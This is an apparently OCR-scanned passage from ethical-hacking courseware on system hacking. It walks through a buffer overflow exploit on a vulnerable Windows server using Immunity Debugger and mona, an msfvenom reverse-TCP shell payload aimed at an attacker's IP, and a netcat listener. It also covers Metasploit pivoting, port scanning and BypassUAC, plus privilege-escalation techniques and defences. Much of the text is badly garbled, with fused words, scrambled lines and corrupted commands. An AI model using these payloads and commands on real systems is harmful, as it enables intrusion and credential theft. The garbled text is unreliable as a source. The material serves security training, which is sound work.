andattachthe vulnerable
Administrator, server to the debugger.
In Immunity
Debugger,type !mona modules i n the bar at the bottomof the window.As
a pop-upwindowis created,
showni n the screenshot, whichshowsthe protection
settingsof
variousmodules.

Figure663:Screenshot
shown i n the screenshot,
‘As
Debugger
of Immunity
showing
one of the modules,
mona modules

essfunc.dll,
lacksmemory protection.
Attackersexploitsuchmodules to injectshelicodeandtakefull controlof theEIPregister.
Now,
run the followingnasm_she11 Ruby scriptto convert assembly language (IMPESP)into hex
code:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

Next,i n ImmunityDebugger,
664:
Figure Screenshot
showing
typethe following
nasm_shell
Metasploit output
commandi n the bar at the bottomof the
windowto determine the return addressof thevulnerablemodule:
tmona find ~s \xff\xed― -m essfunc.d11

ical andCountermensores
Mackin ©by E-Comel
Copyright
InImmunity
665: Screenshoto f immunity
Figure
Debugger,select“Enter
expression
showing
Debugger

enter
return addressof

to follow’,the identified return

vulnerable
module

addressi n the text box,click“OK―,

and press "F2" to set up a breakpoint
at that particular
address,

Now,injecttheidentified into EIPbyrunningthe following

return address script

For
as
example,
if the return addressis “625011a£",
then you
the x86 architecturestores valuesi n the Little Endianformat. must send“\xaf\x11\x50\x62",

6
Modul 642
Page ti l andCountermeasures
Macking
©
Copyightby E-Comell
 667:
Figure Screenshot
of Python
seit fr overwitingE P
Whenyou run the abovescript,you will notice that the EIPregister
hasbeenoverwritten with
the return addressof thevulnerablemodule:

Figure668Screenshot
shownin the screenshot,
‘As
of Immunity
Debugger
showing
attackerscan controlthe EIP register
EIPregister
if the targetserver has
thatdo not havepropermemoryprotection
‘modules settings.

ical andCountermensores
Mackin ©by E-Comel
Copyright
GenerateShellcode
andGainShellAccess
Now,
run the following
msfvenom
command the shellcode:
to generate
msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port>
EXITFUNC=thread -f c -a x86 -b “\x00―
-p > payload,
In the abovecommand, > attacker'sIP,LPORT
LHOST > attacker'sport,-f >
-a
filetype,> architecture,
and-b > badcharacters

669: Screenshotshowing
Figure
af
theoutput msfvenom

ical andCountermensores
Mackin ©by E-Comel
Copyright
Now,run thefollowing Python shellcode
scriptto injectthe generated into theEIPregister
and
gain shellaccess to the target
vulnerableserver:

Before
runningtheabovescript,
670:
Figure Screenshotof Python

following
run the
serit fr
Netcatcommand
EP
overwriting
to listenon port4444:
ne
-nvip 4444

gure 6.7:ScreenshotofNetat

ical andCountermensores
Mackin ©by E-Comel
Copyright
Next,run the abovePython
scriptto gainshella ccessto thetargetvulnerable
server:

re 6.72:Screenshotof
Netcat
remote
showing shellaccess

Figure showing
6:73:Screensht remoteaccess to Admin
account

Modul
6 646
Page tical andCountermensores
Making Copyright©
by Comet
 BufferOverflowDetectionTools
‘llyOb tracesstack frames
dynamically andprogramexecution,and erncade

BufferOverflow DetectionTools
Variousbuffer overflow detectiontools that helpsecurity
professionals
to detect buffer
overflowvulnerabilities
are discussed
below:
=
ollyDbg
Source:http://www.ollydbg.de
OllyDbg analyzing
is a 32-bit assembler-level debugger for Microsoft®
Windows".Its
emphasis on binary codeanalysis makesit particularly usefulwhen the source is
unavailable.It debugs multithreadapplications
and attachesto running programs. It
recognizescomplex code constructs,such as a call to jump to the procedure. It
dynamicallytracesstackframesandprogram execution, andit logsargumentsof known
functions.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ofOlyobg,
6.74:Screenshot
Figure
Someadditionalbufferoverflow
detection
toolsare as follows:
=
(https://www.veracode.com)
Veracode
+
Flawfinder(httpsi//dwheeler.com)
=
Kiuwan (https://www.kiuwan.com)

Splint
(https://github.com)
BOVSTT(https://github.com)

Module
Page 6 648
tical
Making
and
Countermenso
CopyrightÂ
by Comet
 againstBufferOverflows
Defending

Defending BufferOverflows
against
Thefollowing
countermeasurescan beadopted
to defendagainst
bufferoverflowattacks:
+
Develop
programsbyfollowing
secure coding andguidelines
practices
spacelayout
‘Usetheaddress (ASLR)
randomization whichrandomly
technique, moves
aroundtheaddressspacelocationsof thedataregion
Validateargumentsandminimize codethat requires root privileges
levelusingstatic anddynamic
Performcodereview at the source-code codeanalyzers,
Allowthecompiler
to addbounds
to allthe buffers
Implement
automatic boundchecking
Always
protectthe return pointero n the stack

patch
of
Never allowexecution code outsidethecodespace

Regularly applications
andoperating
systems
Perform manually
codeinspection witha checklist
to ensure thatthe codemeetscertain
criteria

Employ stacks,
non-executable ie., dataexecution prevention
(DEP),
whichcan mark
the stackor memoryregionsas non-executable exploitation
to prevent
Implement checking
codepointerintegrity to detectwhethera codepointer
hasbeen
corruptedbeforeitis dereferenced
thecodethoroughly
Scrutinize errors byperforming
to avoidpossible testingand
debugging
ical andCountermensores
Mackin ©by E-Comel
Copyright
Perform
automatedandmanualcodeauditing
Avoid usingunsafefunctionsanduse strncat insteadof strcat andstrncpy
insteadof
strepy
UsetheNXbit to markcertain areas ofmemoryas executable
andnon-executable
Digitally
signthecodebeforelaunching the program
Ensurethatall the controltransfersa re encompassed bya trustedandapproved
code
image
‘Adopt
deep packetinspection (DPI)
fordetecting
remote exploitation
attemptsat the
networkperimeterusingattacksignatures
Consideraltering
the rulesat the operating-system
levelwherethe memorypagescan
holdexecutabledata
UseIDSsolutionsto detectbehaviorthat simulates
a n attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ModuleFlow

Gaining
A ccess
eC ‘Maintaining
Access:

8 comm
e
Escalating
Privileges
Escalating
privileges
is the second hacking.
stageofsystem Attackers
use passwords
obtainedi n
andthen tryto attain higher-level
thefirst stepto gain access to the targetsystem privileges
in
the system. Thevarious toolsand techniques attackersu se to escalatetheir privileges
are

as
described follows.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Escalation
Privilege
An attacker
be
can gan acces to thenetwork
using2 non-admin
user aecountandthe
nextstp would to gi n

T h eatachr
and
performs
configuration
assocated
that
takes
oversights
appeator
offlaws,
errs,
a rivlege escalation
attack
nthe OSandsoftware
advantagedesign programming bugs,
application
to gainadministrativeaccess to thenetworkandts

These
privileges
allow
attacker
view
ertical/senstve
the
information,
to deletefis, rinstal malicious programs

Escalation
Privilege
Privileges role assigned
are a security to users for using specific programs, features, OSs,
functions,filesor codes,etc., to limit theiraccess bydifferenttypesof users. If a user is
assigned he/she
more privileges, can modify or interact with more restrictedpartsof the
system or application
than lessprivileged users. Attackers initially
gainsystem a ccesswith low
privilegeand then try to gain more privileges to perform activities restrictedfrom less
privileged
users. A privilege
escalationattack is the process of gainingmore privileges
than
were
initially
acquired,

6:75:Example
Figure ofprivilege
eseaation
escalationattack,attackersfirst gain accessto the network usinga non-admin
In a privilege
User account and then try to gain administrativeprivileges. Attackersemploy designflaws,
programming errors, bugs, andconfigurationoversights in the OSand softwareapplication
to
gainadministrative access to thenetworkandits associated applications.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Oncean attacker hasgained accessto a remote system with a validusername and password,
he/she will attemptto escalatethe user account to one with increasedprivileges,
suchas that
of an administrator,to perform restrictedoperations. Theseprivileges allowthe attackerto
view critical/sensitive
information, deletefiles, or installmaliciousprograms suchas viruses,
Trojans,
worms, ete.
of
‘TypesPrivilege
Escalation
Privilege
escalationis required
whenyou want to accessthe system resources that you are not
authorizedto access.Privilege
escalation
takesplacei n two forms:
verticalprivilegeescalation
and
=
horizontal
privilege
escalation.
HorizontalPrivilege Escalation:In a horizontalprivilege
escalation,
the unauthorized
privileges belong andother
user tries to access the resources, functions, that to an

can easilyhas
a ccessuser B'sbankaccount. A
authorizeduser who similaraccess permissions.Forinstance,onlinebanking user

Vertical Privilege escalation,

Escalation:In a vertical privilege the unauthorizeduser

a auser higher
privileges,
tries to gainaccess to the resources andfunctionsof
application banking
or site administrators.
access the site using administrative
Forexample,
functions.
with
someone usingonline
such
can

ical andCountermensores
Mackin ©by E-Comel
Copyright
 EscalationUsing
Privilege DLL Hijacking

EscalationUsing
Privilege DLL Hijacking
Most Windowsapplications do not use the fullyqualified pathwhen loading an externalDLL
library;instead, theyfirstsearchthedirectory fromwhichtheyhavebeenloaded. Takingthisas
an advantage, if attackerscan place a maliciousDLLi n the application
directory, the application
will execute themalicious DLLi n place of the realDLL.For example, if an applicationprogram
needslibrary.dll
“exe― (usually in theWindowssystem directory)
to installthe application,
and
failsto specifythe library.dll
path,Windowswill searchfor the DLLi n the directory fromwhich
the application was launched. If an attackerhasalready placed
the DLLin the same directory as
program.exe,
to gainremote accessto thetargetsystem, of
thenthat maliciousDLLwill loadinstead the realDLL, whichallowsthe attacker

Application
Directory

Op.
User
a
pistons aici LL

RealDL requiredby
the exe application
DLLLibrary
‘Windows
Figure6.76: ofprivege
Example OLLjacking
ationusing

ical
Mackin
and Copyright
©
by Countermensores E-Comel
SytemHacking

Attackers andPowerSploit
use toolssuchas Robber to detecthijackable
DLLsandperform
DLL
hijacking
on the target
system:
=
Robber
Source:https://github.com
Robberis an open-sourcetool that helpsattackersto find executablesprone to DLL
hijacking.
an
Attackersuse

DLLhigh
malicious
to
Robber find out whichDLLsare executablerequests
this searchprocess);
absolutepath(triggering
upthe searchpathso it
without
attackerscan then placetheir
getsinvokedbeforethe original
DLL.

Figure
6.7: Screenshot showing
ofRobber injectable
DLs

Module
6 655
Page ical
and ©
Mackin
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
 EscalationbyExploiting
Privilege Vulnerabilities

appication
sits
‘software
Securtyocu
expo
on sch as

Oxtabare
upon
itn /mn secures com] and
plot htps//aam .cm)

EscalationbyExploiting
Privilege Vulnerabilities
Vulnerability is the existenceof a weakness, design flaw,or implementation error that can lead
to an unexpected eventcompromising the security of the system. An attacker employs these
vulnerabilitiesto perform various attackson the confidentiality, availability, or integrityof a
system. The softwaredesign flawsand programmingerrors leadto security vulnerabilities.
Attackersexploit thesesoftwarevulnerabilities, suchas programming flawsi n a programor
service, or within the OS softwareor kernel, to execute maliciouscode.Exploiting software
vulnerabilitiesallowsattackersto execute a commandor binary o n a targetmachineto gain
higher privileges than the existingones or bypass security mechanisms. Attackersusingthese
exploits can even accessprivileged user accountsandcredentials.
There are many publicvulnerability repositories available online that allow access to
informationaboutvarious software
on the OS and software application
(https://www.securityfocus.com)
Exploit
vulnerabilities.Attackerssearch
that
for exploits are based
o n exploit sites such as SecurityFocus
Database (https://www.exploit-db.com)
or and use
theseexploits
to gainhigh
privileges.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Fgure678:Screenshot 08 showing
of Exploit escalationvulneraities
privilege

ical andCountermensores
Mackin ©by E-Comel
Copyright
 EscalationUsing
Privilege DylibHijacking 13
¢H

(io
canine
1 amacer

MickScanner
a maius

taht
dyna
detect
one fhe

dye
par ractars,

tht re vuerable
walbeemeted
thnk tack
ipsc
the
aga as

1
Dyno
perm
acters seo sucha s fs hjaeingo

So eo a -—

EscalationUsing
Privilege DylibHijacking
Similarto Windows, OSX is alsovulnerableto dynamic library attacks.OSX provides several
legitimate methods, suchas setting the DYLD_INSERT_LIBRARIES environment variable, which
are user specific.
Thesemethods forcethe loaderto automatically loadmaliciouslibraries into a

whichi n turn allowsan attacker

cases,the loadersearches
X
targetrunningprocess.OS allowsthe loading
to place
for dynamic
of weakdylibs
a maliciousdylib
librariesi n multiple
(dynamic
paths.
libraries)
in the specified
dynamically,
location.In many
Thishelps a n attackerto
injecta malicious dylib
i n one ofthe primarydirectories andsimply loadthemalicious dylibat
runtime. Attackerscan utilize suchmethodsto perform various maliciousactivities suchas
stealthy persistence,run-timeprocessinjection, bypassing security software,andbypassing
Gatekeeper.

DylibHijack
Figure6:79:
Scanner helps
of
Example
attackersto detectdylibs that are
privilege
Dy jacking
using
escalation
vulnerableto hijacking
attacks.
Afteridentifying
vulnerabledylibs, attackersuse tools suchas DylibHijack to performdylib
hijacking
on the targetsystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
 EscalationUsing
Privilege andMeltdown
Spectre
Vulnerabilities

\@
spectre
vlnrabities
design
ofmodem
andmeltdown
are
chip
rom
AMO, found
inthe processor ARM,a nd

_tackers
ad
stesystem
explathesewineries to gl o unauthored
acest ral Information
such
8

Spectre ‘Meltdown
Vulnerability Vulnerability
toeaclaeprvlegesby
unpaged forcing
an

Escalationusing
Privilege andMeltdown Vulnerabilities
Spectre
Spectre
andMeltdownare recent CPUvulnerabilitiesfound i n the design
of modernprocessors,
including
chips
fromAMD,ARM,and Intel,causedbyperformance i n these
optimizations
processors. Attackersmayexploit thesevulnerabilitiesto gain unauthorizedaccessandsteal
criticalsystem suchas login
information credentials, secretkeys,keystrokes,encryption keys,
etc. storedin the application's
memoryto escalateprivileges. Theseattackscan be performed
privileges
becausethe normalverificationof the user’s is disrupted
through the interaction of
featureslike branchprediction,out-of-orderexecution,caching, and speculative execution.
Using thesevulnerabilities,
attackerscan exploit
various IT resources,suchas most OSs, servers,
PCs, cloudsystems, andmobiledevices
=
Spectre Vulnerability
TheSpectre vulnerabilityis found i n many modernprocessors, includingApple,
AMD,
‘ARM,Intel,Samsung, and Qualcomm Thisvulnerability
processors. allowsattackersto
trick a processor into exploitingspeculativeexecution to readrestricteddata.Modern
processors implement speculative execution to predict the futureto completethe
execution faster.For example, if the chipidentifiesthat a program includesmultiple
conditionalstatements,it will start executing and concluding all the possible
outputs
beforethe programdoes.Attackersmayexploit
thisvulnerability
i n differentways:

© The processor is forced to accomplish

a speculative
execution of a read before
boundchecking is performed. an attackerc an accessandreadout-of-
Consequently,
©
boundsmemory
Whenexecuting
locations.
conditionalstatements,for faster processing,
the processors use
branchprediction
to picka pathto execute speculatively.
Attackersmayexploitthis

ical andCountermensores
Mackin ©by E-Comel
Copyright
 to takean improperspeculative
featureto forcethe processor decision
andfurther
access dataout of range
‘Attackers to readadjacent
mayuse this vulnerability memorylocationsof a process and
accessinformationfor whichhe/she Thisvulnerability
i s not authorized. helps attackers
to extract confidentialinformation,suchas credentials storedi n the browser,fromthat
targetprocess.In certain cases,usingthis vulnerability, an attackercan even readthe
kernelmemoryor perform a web-based attackusingJavaScript.
MeltdownVulnerability
Meltdownvulnerability
is foundi n all Intel andARMprocessors byApple.
deployed This
vulnerability
allowsattackersto trick a process into accessingout-of-boundsmemory by
exploitingCPUoptimization mechanisms suchas speculativeexecution. Forexample,
an
attackerrequests memory location.He/she
to access an illegal sendsa secondrequest
to reada validmemorylocationconditionally.
In thiscase,a processorusingspeculative
execution will complete
evaluating beforechecking
the resultfor both requests the first
request.Whenthe processorchecksthat the first request it rejectsboth
is invalid,
requests after checkingthe privileges.
Eventhough the processorrejectsboth the
requests,the resultsof both the requests r emain i n the cachememory.Now the
attackersendsmultiplevalid requests
to accessout-of-bounds memorylocations.
may use this vulnerability
‘Attackers to escalateprivileges
byforcing
a n unprivileged
processto readotheradjacent memorylocations,suchas kernelmemoryand physical
informationsuchas credentials,
memory. Thisleadsto criticalsystem privatekeys,
ete.
being
revealed.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Escalationusing Named Pipe
Privilege Impersonation

Escalationusing
Privilege Named Pipe
Impersonation
In WindowsOS,namedpipes are usedto provide legitimatecommunication betweenrunning
In thistechnique,
processes. the messages are exchanged betweenthe processes usinga file.
Forexample, if processA wants to senda message to anotherprocess B,then processA writes
the message
this technique
access
a
to file and processB reads the message
to escalatetheir privileges
privileges.
from that file. Attackersoften exploit
on the victim system to a user account with higher

In anyWindowssystem, whena processcreates a pipe,it will act as a pipeserver. If anyother

processwants to communicate with this process,it will connect to this pipe and it becomes a
pipeclient.Whena clientconnectsto the pipe,the pipeserver can utilizetheaccessprivileges
context of the pipe client.Attackersexploit
and security thisfeaturebycreating a pipe server
with
fewer
privileges
Attackers
to andtrying connectwith a clientwith higher
use toolssuchas Metasploit to perform
privileges
than
namedpipeimpersonation
the server.
on a targethost.
Attackersexploitvulnerabilitiesthat exist i n the targetremote hostto obtain an active session
anduse Metasploit commands suchas getsystem privileges
to gain administrative-level and
hashesof theadmin/user
extract password accounts.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 682: showing
Figure
dump
of
password
of Metasploit
Screenshat hashes

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Privilege
EscalationbyExploiting
Misconfigured
Services CEH
‘Unguoted
ServicePaths ServiceObject
Permissions

menecyecteegteaniney
enlting sch

Privilege
EscalationbyExploiting
Misconfigured
Services (Contd) C/E

= I

PrivilegeEscalationbyExploiting
Misconfigured
Services
Attackersgenerally exploitzero-day vulnerabilitiesthat exist i n targetsystems to escalate
privileges.
If attackersare unableto find suchexploits, theytryto escalateprivileges byabusing
misconfigured services in the targetOS.Insecureor improperconfiguration of systemservices
allowsattackersto elevatetheir privileges i n the targetsystem. Forexample, attackersexploit
misconfigured services suchas unquoted service paths,service object unattended
permissions,
installs,modifiableregistryautoruns and configurations,
etc. to elevate access privileges.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers
use toolssuchas Metasploit
to obtainan active sessionwith the targethost.After
establishing to detectmisconfigured
an active session, attackersuse toolssuchas PowerSploit
servicesthat exist in thetargetOS.

roteter
Uploading > pal Power Uppal]
[Upload root PowerSplont/Privesc/Powerip.
7root/Powersploit/Privesc/PowerUp:ps1-->Powerlp-psT

Unquoted
683:Screenshot
Figure
ServicePaths
of Metasploit
showing
shell
access to thetargets ystem

In Windows OSs, whena service starts running,the system attemptsto findthe location
of the executablefileto launchthe service successfully. Generally,the executablepath
is enclosed i n quotation marks so that the system
“", can easilylocatethe application
binary.Someexecutable filesmaynot includequoted paths and include whitespace in
between; in this scenario,the system
thefoldersthat exist i n thepath
with unquoted
paths
to
tries find the application
until the executable
privileges
running underSYSTEM
is found.
binary
Attackers
to elevatethelr privileges.
bysearching
exploit
all
services

Figure684:
Screenshot showing
of Metasploit to detectunquoted
executionofPowerSplot service paths

6
Module Page665 ical andCountermensores
Mackin
©
by E-Comel
Copyright
Service Object
Permissions
misconfigured
‘A service permission mayallowan attackerto modify
or reconfigure the
attributesassociatedwith that service. Thismayeven leadto changing the locationof
the application
binary to a maliciousexecutablecreatedbythe attacker.Byexploiting
suchservices,attackerscan even add new users to the localadministratorgroupi n the
system. Attackersthenhijackthe newaccountto elevatetheir accessprivileges.

AppendData/Addsu

685:of
Figure
Unattended
Screenshot
Installs
Metasploit
showing o f Powersploitto
exeeution
service
detectmisconfigured permision

Unattendedinstallsallowattackersto deploy WindowsOSswithoutthe intervention of

an administrator.Administratorsneed to manually clean up the unattendedinstall

the configuration settingsset during XMLall

detailsstoredin the Unattend.xmlfile. This file stores the informationrelatedto
the installationprocessand may also include
sensitive informationsuchas the configuration of localaccounts,usernames,and even
decodedpasswords.

ical andCountermensores
Mackin ©by E-Comel
Copyright
In Windowssystems, fileis storedin one ofthefollowing
theUnattend.xm! locations:
c:\Windows\Panther\
c:\Windows\Panther\Unattend\
c:\Windows\system32\
C:\Windows
If attackers
\system32\sysprep\
can gainaccessto thisfile,thenthey can easilyobtaincredential information
and configuration settingsusedduring the installationof that service or application
Attackersuse thisinformationto escalateprivileges.

686:of showing
Figure
of detect
Screenshot
Metasploit execution
Powerspolt
to unattended
install

ical andCountermensores
Mackin ©by E-Comel
Copyright
 and Relaying
Pivoting to Hack External Machines

therequestsfo acestheresources
‘waytha are comingromthei l y compromised
system

and Relaying
Pivoting to HackExternalMachines(Cont'd)
Ooicovrinehonsinterewok
Pivoting
—_ ©
setup
routings

@
cent
winerbi ries

6
Module 668
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
 to HackExternal Machines(Cont'd)
and Relaying
Pivoting
Relaying

1.Setu p portforwarding
rules

(@ Aerackers
canbrowsethe hepserver runningon thetreet
systemu ng the following
URL;

netp://Lecatnost10080
2.Access
thesystom
resources

the following
byexecuting command:
1 amn myadnineiocainost

andRelaying
Pivoting to HackExternalMachines
Pivoting
and relaying
are the techniques
usedto find detailedinformationaboutthe target
network. Thesetechniques are performed
aftersuccessfully
compromisinga targetsystem.The
compromised systemis usedto penetratethe targetnetworkto access other systemsand
resourcesthatare otherwise fromtheattacking
inaccessible network.
In the pivotingtechnique,
onlythe systems through
accessible the compromised systems
are
exploited, whereas i n the relaying technique, the resources accessiblethroughthe
compromised systemare explored Using
or accessed. pivoting,attackers can open a remote
shello n the targetsystemtunneledthrough the initial shello n the compromised system. In
relaying, resourcespresent on theothersystems are accessed through a tunneledshells ession
on the compromised system.
Thefollowing diagrams andrelaying
illustratethe pivoting techniques:

i
6
Figure47:Musrationof pivoting
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detailedexplanation
of andrelaying
the pivoting
688:of
Figure Mustration
relaying
techniques is as follows:

Pivoting
the firstobjective
In this technique, of an attackeris to compromise
a system
to gain a
remote shellon it, andfurther bypass
the firewall to pivotthrough the compromised
systemandgainaccessto theothervulnerablesystems in the network.
Oncethe system is successfully
compromised, a Meterpreter session is established.
As
the session is pivotedthrough the compromised system, the targetsystemcannot
determinethe
Steps
to perform
actual
of
pivoting:
origin the exploitation.

1. Discover
livehostsi n the network
Oncea system is compromised, to discoverthe listof live
an ARPscanis performed
systemsi n the network.

For example,
an attackeruses the following
commandto detectlive hostsi n the
targetnetwork:
> run
post/windows/gather/azp_scanner
RHOSTS<target subnet range>

689:
Figure Screenshoto f Metasploit

ical
resultsof arp_scanner
showing

andCountermensores
Mackin ©by E-Comel
Copyright
 shownin the screenshot,
‘As the scan resultsshowseven IP addresses
reachable
from the compromised system.To find out more informationabout these IP
attackers
addresses, perform
portscanning,
. Set up
routing
rules
Priorto using Metasploit
to run portscanner against
a two IPaddresses
i n the target
network, implement
attackers routingrulesto instruct Metasploit
to route all the
traffic destinedto the privatenetwork using the existingMeterpreter session
establishedbetweenthe attacker's
system andthecompromised system.
Forexample,
>
an attacker
background
can
use
the
following this
perform
step: commands
to

> route add <IP address> <eubnet mask> <eession number>

rule to
Routing to route any traffic destinedto 10.10.10.0
instruct Metasploit
255.255.255.0 to session number 1 (Meterpreter session establishedwith a
system)
compromised

. Scanportsof
690:Screenshot
Figure
live systems
of Metasploit
up
setting routingu le

Once the rule is implemented,

routing portscanningis performed the live
against
systems.
Forexample, theattackerusesthe following to perform
commands portscanningo n
the targetsystems:
> use auxiliary/scanner/portscan/tep
> set RHOSTS<IP addresses>
> set PORTS 1-1000
> run

showni n
‘As the result displays
the screenshot, the open portson the private
systems.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 xiliary(
10.10.10. 1
ary
fet
RHOST
fet PORTS 1-1004
10.10.10.10

a)

1.10.10 To. TCPOPEN

10.10.11 TCP OPEN

10.10.10:
10.10.10:
10.10, 10.
10.1 TCP OPEN
TCP OPEN
TCPOPEN

10.10.10
R

ts
(100% complete

screenshot
of Metasploit results
showing of port can

4. Exploit vulnerableservices
After the portsare scanned,the vulnerableservices runningon thoseportscan be
exploited.
For example,
an attackercan use BypassUAC
exploitto bypass
the UserAccess
Control(UAC)
setting.
shownin the screenshot,
‘As a successful
sessionis established
to the vulnerable
bypivotingthrough
system a compromised
system.

Started reverse TCPhandler on 10,10.10.13:4444

UAC is Enabled, checking
Le
I+] Part of Administrators group! Continuing
SUAC can bypassthis setting, continuing
Configuring paytoad and 3
istry Key
Executing payloa €:\WINDOWS\
1¢ System
dhelper-ex
13:4444 ->
10 2091) at
19-11-06 03/411

Figure692: thetargetsytem
Accessing

6
Module 672
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Relaying
If the pivotingtechnique is unsuccessful,attackersuse the relaying
technique to exploit
vulnerable
‘a systemi n the target network.Attackersuse relayingto access resources
presenton other systems in the targetnetworkvia the compromised systemin sucha
way that the requests to access the resources come from the initially compromised
system.
Steps
to perform
relaying:
1, Set up portforwarding rules
Themain purposeof portforwarding is to allowa user to reacha specific
porton a
system that is not presenton the same network.Theinitially compromisedsystem is
responsiblefor allowing directaccess to the system, whichis otherwiseinaccessible
fromthe attacking system.
Using a Meterpretersession,a listenercan be createdusing a portnumberfrom a
list of open portson the localhost, whichlinksthatlistenerto a port on a remote
server. Thislinking
of portsis knownas portforwarding.
For example, here,the attackerchoseport numbers80,22,and445to set up port
forwarding
rules.

693:Applying
Figure portforwarding
rules
. Accessthe system
resources

Onceportforwarding hasbeensuccessful, an attackercan use an appropriateclient

program to accessthe remote resources presenton the target
system,
For example:
Attackerscan browsean HTTP server runningo n the targetsystembyusingthe
following URL:
http: //lecathost: 10080
‘Attackers
can accessan SSHserver runningon the targetsystembyexecuting
the
following
command:
# ssh myadmin@localhost

ical andCountermensores
Mackin ©by E-Comel
Copyright
 1
Other Privilege
EscalationTechniques CEH

Application
rence Shimizu rove
comps ewan heir

Other Privilege
Escalation Techniques
(Cont'd)

‘Setgid wah
seg
‘eran appcaton he etd gts maou cde wih ead

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Other Privilege
EscalationTechniques
(Cont'd)

\e Archers
cn sudo
overwritethe confguatinf ile,/ete/susearsw ih ther own maious

(exacts can
ulneabitesattain
superuser aces root eel aces tothe target
tem byexpoingkena

Other Privilege
EscalationTechniques
+
TokenManipulation
Access
In WindowsOSs,
or
associated
access tokensare usedto determinethe security
thread,Thesetokensincludethe access profile
with a process.After a user is authenticated,
context of
(identity
andprivileges)
produces
the system
of a user
an access
a
process

token.Every processthe user executes makesuse of this access token.The system

verifiesthisaccess tokenwhena processis accessinga securedabject.
Windowsuser
‘Any can modify these access tokensso that the processappearsto
belong to some other user than theone whostartedit. Then,the process acquiresthe
securitycontext of the new token.For example, Windowsadministrators haveto logon
as normal users and need to run their tools with admin privileges using token
manipulation command Attackerscan exploit
“runas.― thisto access thetokensof other
users, or generatespoofed tokens, to escalateprivileges and perform malicious
activities whileevading detection.

TheWindows
provide
compatibility
application
Compatibility
OSsusea WindowsApplication Framework
calledshims
betweenthe olderand newer versions of Windows.Forexample,
shimming
allowsprogramscreated XP to be compatible
forWindows with
to
Windows10.Shimsprovide a buffer betweenthe programandthe OS.Thisbuffer is
referencedwhena programis executedto verifywhetherthe programrequires access
to the shimdatabase,Whena programneedsto communicate with the OS, the shim
databaseuses API hooking
to redirectthe code.All the shimsinstalledbythe default
Windowsinstaller(sbinst.exe)
are storedat

ical andCountermensores
Mackin ©by E-Comel
Copyright
AWINDIR‘
\AppPatch\sysmain.
hklm\software\microsoft\windows
sdb

nt\currentversion\appeonpatflags\installedsdb
andthey
Shimsrun i n user mode, cannot modify
the kernel.Someof theseshimscan be
usedto bypassUAC(RedirectEXE),
injectmalicious DLLs(InjectDLl),
capturememory
addresses(GetProcAddress),
etc. An attackercan use theseshimsto perform
different
attacksincluding
disabling
WindowsDefender, privilegeescalation, backdoors,
installing
etc.
Filesystem
Permissions
Weakness
Manyprocessesi n the Windows O Ssexecute binaries automatically
as partof their
functionality
or to perform
certain actions. If the filesystempermissions of these
binariesare not set properly,
then the targetbinary file may be replaced with a
maliciousfile,andthe actualprocessc an execute it. If the process that is executing
this
binaryhashigher-level permissions,then the binary also executes under higher-level

permissions,
original
whichmayincludeSYSTEM. Attackerscan exploit
binarieswith maliciousbinaries to escalateprivileges.
technique to manipulateWindowsservice binaries
thistechnique

andself-extracting
to replace
Attackers use this
installers.
PathInterception
is a methodof placing
Pathinterception i n a particular
an executable pathi n sucha way
thattheapplicationwill execute it in placeofthelegitimate target.Attackerscan exploit
severalflawsor misconfigurations to perform pathinterception like unquoted paths
(service
paths
and shortcutpaths),
pathenvironment variable misconfiguration,
and
searchorderhijacking. helps
Pathinterception a n attackerto maintain persistence
on a
systemandescalateprivileges.
Scheduled
Task
TheWindowsOSincludesutilitiessuchas ‘at’
privileges
can use theseutilities i n conjunction user
and‘schtasks.’
A withadministrator
with the TaskSchedulerto schedule
or
programs scripts

remote procedure
that can beexecutedat a particular
properauthentication,he/she
call (RPC).
c an alsoschedule date
and time. Ifa user provides
a taskfrom a remote systemusinga
An attackercan use this technique to execute malicious
programsat systemstartup, perform
maintain persistence, remote execution, escalate
privileges,
etc.
LaunchDaemon
During
the MacOSand OSX booting
process, launchdis executedto complete
the
system-level
systeminitializationprocess.Parametersfor each launch-on-demand
daemonfound i n /System/Library/LaunchDaemons and /Library/LaunchDaemons are
loadedusinglaunchd. Thesedaemons havepropertylistfiles(plist)that are linkedto
executablesthat run at the time of booting. Attackerscan create and install a new
launchdaemon, whichcan beconfigured to execute at boot-uptime usinglaunchd or
launchetlto load plistinto the relevantdirectories.Theweakconfigurations allow an

ical andCountermensores
Mackin ©by E-Comel
Copyright
attackerto alter theexisting
launchdaemon’s
executable
to maintain persistence
or to
escalateprivileges.
PlistModification
In MacOS and0SX,plist(property list)filesincludeallthenecessaryinformationthatis
neededto configure applicationsand services. Thesefiles describewhen programs
shouldexecute,theexecutable filepath, programparameters, essential
OSpermissions,
etc. The plistfiles are stored at specific locationslike /Library/Preferences
(which
executewith high-level privileges)and~/Library/Preferences (whichexecutewith user
privileges).
Attackerscan accessandalter theseplistfilesto execute maliciouscodeon
behalfof a legitimate user, andfurther use them as a persistence mechanism and to
escalateprivileges.
SetuidandSetgid
In Linux and MacOS, uses setuidor setgid,
if an application the application
will execute
withthe privileges Generally,
of the owninguser or group,respectively. the applications
un privileges.
underthe current user’s Thereare certain circumstances wherethe
programsmust beexecuted with elevatedprivileges but the user runningthe program
doesnot needthe elevatedprivileges.
In this scenario,one can set the setuidor setgid
flags
fortheir applications.
An attacker can exploitthe applications withthesetuidor
setgid
flags codewith elevatedprivileges.
to execute malicious
WebShell
web shelli s a web-based
‘A scriptthat allowsaccessto a
createdin all OSslike Windows,
injecta malicious
Linux, MacOS, web
X.server.
shellsWeb can be
andOS Attackerscreate webshellsto
scripton a web server to maintain persistentaccessand escalate
privileges.
Attackersusea webshellas a backdoorto gain accessandcontrola remote
server. Generally, a webshellruns underthe current user'sprivileges.
Usinga web shell,
